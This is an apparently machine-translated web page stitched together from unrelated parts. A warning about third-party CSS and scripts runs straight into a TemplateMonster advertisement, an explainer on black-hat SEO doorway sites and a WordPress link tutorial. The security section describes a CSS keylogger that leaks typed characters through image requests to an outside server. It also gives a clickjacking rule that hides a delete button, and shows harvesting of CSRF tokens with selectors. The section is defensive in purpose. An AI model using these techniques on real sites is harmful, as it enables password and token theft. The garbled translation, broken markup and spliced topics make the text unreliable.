We tell you how you can harm your site using third-party CSS, JavaScript and other resources from other people's servers.
At the end of February, a keylogger appeared on the web that partially uses CSS. The attack with its help is simple: for each character entered in a field with a certain type (for example, password), a request is generated to a third-party server, supposedly requesting a background image:
On the server, the query sequence can be registered and the entered password can be easily calculated.
In the process of discussing the problem, some suggested that browser manufacturers work on a fix. Someone noticed that the problem is relevant only for sites on React-like frameworks, and shifted the blame to them.
If you add this kind of image to your site, you will become dependent on example.com. They can set you up different ways, for example, remove the image - you will get a 404 instead of an image. Or they can just replace the cat image with something less pleasant.
You can warn your users that the image was added from a third-party resource and you are not related to it. This will save you some trouble. But of course, when you add a simple picture, you don't give access to the passwords.
This example is much more interesting for example.com because by adding a script from their site you give them a lot more control over theirs. In this case, example.com might:
In other words, now example.com can do a lot of things.
If you still run into a bad script, try using the Clear-Site-Data header .
Third-party CSS-code on the impact on the site is between the picture and the script. Alien CSS can:
CSS will not be able to interact with local storage and the cryptominer will not embed on the page, but it can bring a lot of harm to the owner of the resource.
This code will send data about the entered character "a" to the handler under the guise of a picture request. Repeat the code for each character and you already have a CSS keylogger.
By default, browsers don't store user-entered characters in the value attribute, so this trick will work if you use something that synchronizes values like this, like .
Of course, this problem can be solved on the side of React and similar frameworks. But then only a specific case will be solved, and the rest of the problems will remain.
This is, of course, a very peculiar example, but still a working one. Imagine if your users, when entering the site, will see instead of the usual home page incomprehensible error. In the same way, third-party code can remove, for example, the "buy" button or do some other nuisance.
And just like that, your prices skyrocketed.
Delete-everything-button ( opacity: 0; position: absolute; top: 500px; left: 300px; )
Take a button that does something terrible that the user won't just click, make it transparent, and place it somewhere where the user is sure to click.
Of course, if the button does something really important, the user will first see a warning dialog. But that's not a problem either: it just needs more CSS. For example, you can change the content of the "Oh my God, no!" button to "Sure, I'm sure."
Imagine that browser makers fixed the keylogger trick. Attackers simply put an extra text field on top of an important password field and they are back to business.
The value and other attributes do not necessarily store passwords: an attacker might find something else of interest.
|
<
input
type
=
"hidden"
name
=
"csrf"
value
=
"1687594325"
>
<
img
src
=
"/avatars/samanthasmith83.jpg">
<
iframe
src
=
"//cool-maps-service/show?st-pancras-london">
<
/
iframe
>
<
img
src
=
"/gender-icons/female.png"
>
<
div
class
=
"banner
users
-
birthday
-
today
»>
<
/
div
>
|
All this data can be collected CSS selectors and send it wherever you want.
Any website owner wants to have a beautiful design! So, the question arises, how to get a quality design for a web resource, while quickly and at an affordable price?
Development of website design with the involvement of third-party resources
What's happened third party resources? It will not be news to anyone that to create a website, if you yourself do not know where to start, you will need a developer and a designer. Involving these masters in the work, one should be prepared for the fact that everything will not work out quickly.
Each specialist has his own vision and each understands in his own way what is “correct”. So be prepared to defend your opinion. All such disputes and alterations take a lot of time, effort and money, since the services of developers and designers are not cheap.
Given the above, the question arises: “Why involve third-party resources to create a site?”. Oddly enough, but there are certain advantages. Firstly, such cooperation allows you to create not only a beautiful design for the site, but also completely unique. Secondly, you can implement such a layout for your web resource that you have always dreamed of, even the most complex and filled with all sorts of sections and menus of varying complexity.
Create beautiful designs with templates
Templates- this is a ready-made design that you can use to create a website. If you want to create a site to work on a specific CMS, then you can choose a template that is designed specifically for this platform.
What are the benefits of using templates? After looking at the screenshots above, or rather the price of the proposed layouts from the company TemplateMonster, we can definitely say that the pricing policy for templates is very loyal.
For little money, you get not only a beautiful design, but also modern functionality. In addition, all templates are customizable, so even if something in the layout design does not suit you, you can change or delete it. Thanks to clear interface admin panel, you can easily figure out the available settings, without involving outside help which saves a lot of time and budget.
Most of the templates are adaptive, which makes it possible to create a functional site that can work on any type of device. Another characteristic that is clearly worth considering when choosing the right template is versatility!
Team TemplateMonster has developed a certain type of templates that can be used for sites of different directions, for example, an online store or a blog, as well as for resources on various topics (construction, furniture store, etc.).
And finally, the most important advantage of working with ready-made layouts TemplateMonster is that by purchasing a theme, you get access to free service technical support 24/7. Therefore, if you have any questions related to how to install or customize the purchased theme, you can get expert help!
Beautiful website designs are the first step to success! Users, opening the site, first visually evaluate the resource, and then look at what information it contains. So if you want to have a large number of customers, readers or buyers, it is important to be able to grab their attention at first sight so that they do not leave your site forever. But how to do it? That's right, use a beautiful design for your resource that can interest and arouse interest among users.
When deciding how to create a site (create from scratch or use a template), it is important to determine the main tasks for the resource, which will allow you to choose the most appropriate way. Of course, you can take on the development of a web page yourself, especially since you know best what you need! But, in this case, a certain level of skills and knowledge is required.
If you don’t have all this, but you really want to do the design for the site yourself, opt for templates TemplateMonster. Here you don’t need great skills and everything is clear even for a novice user!
Doorway (syn. dor, from English doorway, or front door)
— black hat SEO tool, a site designed to redirect users to another online resource.
The site is useless from the point of view of the user, who often does not even have the opportunity to view his page. Doorway sites are often registered on free hostings.
The text content is often meaningless, consists of fragments of sentences with a huge number of keywords. Such sites only clog the Internet. The main goal of dora is to be indexed and get into the search results.
Typology of doorways
With the advent of algorithms, the relevance of resources was calculated based on competent content and well-organized semantic core. But it was not possible to design resource pages for absolutely all requests, while maintaining the readability of the material, which led to the inevitable emergence of doorways. After the advent of link ranking, this method of promotion appeared in its modern form, namely as redirecting users to another site and broadcasting link weight.
Among the doorways, the following types can be conditionally distinguished:
- White doors are law-abiding sites that may contain copyrighted content and high-quality graphics. Once on such a site, the user can follow the links to get to the promoted resource.
- Gray dora are sites whose main task is to transfer the link, so the text materials on such sites are unique and understandable, and the links are inserted into the text environment. With the support of TIC and PR doorways, the main site can increase its link weight.
- Black doors are sites whose main task is to automatically redirect, or redirect, to a third-party resource, which is not welcomed by search engines. To implement this task, meta tags or java scripts are configured. Nonsensical texts are placed on black doorways because the user will not have time to read them anyway. The main goal is to promote the main site up in search results. In the creation of doorways, the so-called dorgens make an unbearable contribution, who “invent” texts with the required queries.
Doorways and SEO
Doorways are included in effective methods website optimization. Avoiding penalties from search engines is not difficult - you just have to follow simple rules. It takes a lot of time to create doors and, in fact, their optimization is no different from the promotion of ordinary resources.
Doorways and search engines
For promotion by doorways, systems are banned or pessimized. The Yandex rules say that sites that broadcast users to third-party resources will be classified as spam and removed from the index. But only doorways are banned or pessimized, with the exception of doors on the subdomain of the main address; the main site remains intact.
But really search engines dors are rarely punished, as they can easily confuse them with quite reputable sites (for example, microsoft.ru), which redirect for good.
White and gray doras cannot be accused of spam at all.
How to deal with them?
As mentioned earlier, it is difficult for search engines to find doorways. Although the algorithms are constantly updated and strive to detect and stop redirect attempts using meta tags and scripts, the development of doorways also does not stand still, and webmasters are constantly adding innovative methods of redirecting users.
The easiest way to add links to third-party resources and links between pages and blog posts in WordPress is using the Insert/Edit Link tool built into the editor. It is a little more difficult to insert links to a specific paragraph, paragraph, line within pages and posts, which are manually formed in the HTML code.
Links to third party resources
1. Open the page of the third-party site in the browser to which we want to paste the link, and copy the URL from the address bar to the clipboard.
2. Go to the window for editing your post or page, select the text of the future link or put the cursor in the place where the link should be, click on the toolbar text editor button with hint "Insert/change link". V previous versions WordPress immediately opened the main window with the title "Insert/Change Link". If I'm not mistaken, since version 4.5 it began to open in a collapsed form with a field for inserting an address and two buttons: "Apply" and "Link settings" - this button expands the "Insert / change link" window.
3. In the window that opens for adding a link, paste the address from the clipboard and click on the "Apply" button (and if the link text was not previously selected, click the adjacent "Link Settings" button, as in paragraph 5, to add the link text):
Since in the example the link text was selected in advance, the link is ready:
Third party link: Cheap Flights.
4. To change the URL, add or edit the displayed text, the method of opening (in the current or new window), select the link and click the "Change" button in the window that appears:
5. A familiar window will open with a field for adding a URL, in which we press the "Link Settings" button to get a maximized window:
6. The main window "Insert / change link" will open:
In this window, you can check the box next to "Open in a new tab", replace, if necessary, the URL, add or change the text of the link. Since you can insert a link without selecting the text in advance, but by adding it to the "Link Text" field of the "Insert / Edit Link" window, the link will be added to the place where the cursor originally stood. Click the "Update" button.
Links between pages and blog posts
To insert a link to a page or post on your blog, select the text of the link or put the cursor in the place where the link should be added. Click the button on the toolbar "Insert/Edit Link". In the window that opens, click the "Link settings" button, after which the main window "Insert / change link" will open:
From the list in the lower half of the window, select a page or entry, click on it, the URL is inserted automatically, the link text, if not selected in advance, can be manually entered into the appropriate box or pasted from the clipboard by first copying the name of the page or entry directly in the list. If necessary, check the box "Open in a new tab" and, of course, click the "Add link" button. Link to my blog page added:
Link to your blog page: .
Links within pages and posts
To link to a specific location on a page or post, that location must be tagged somehow. To do this, a bookmark is inserted next to it, or, as it is also called, an anchor. By the way, on the "Visual" tab, this bookmark will be marked with an anchor figure. As an example, consider inserting links into the table of contents of this article and inserting bookmarks (anchors) into the titles of the relevant sections to navigate to them from the table of contents.
Bookmarks are inserted in the HTML editor (on the "Text" tab) and are the following construction:
Instead of link1, insert the name of the bookmark.
Instead of link1, insert the name of the bookmark to which you want to follow the link, the # symbol (pound sign, hash) means that it is followed by id. The # without an id in the link indicates the beginning of the page and is used to return to the beginning (up).
Now everything is in order:
1. We come up with a name for the bookmark and go to the HTML editor by selecting the "Text" tab.
2. Insert a bookmark in the right place in the article. I've inserted anchors next to the section headings:
If you place text between the opening and closing tags a, it will be tinted as a link.
3. Insert links to bookmarks in the table of contents:
4. Now you can test, including the "Up" link:
Up
5. Full link on a bookmark looks like this: page URL/#link1. It does not need to be compiled manually, just follow the link to the bookmark and copy the full URL to address bar. You can use this address to go to the bookmark from other sites.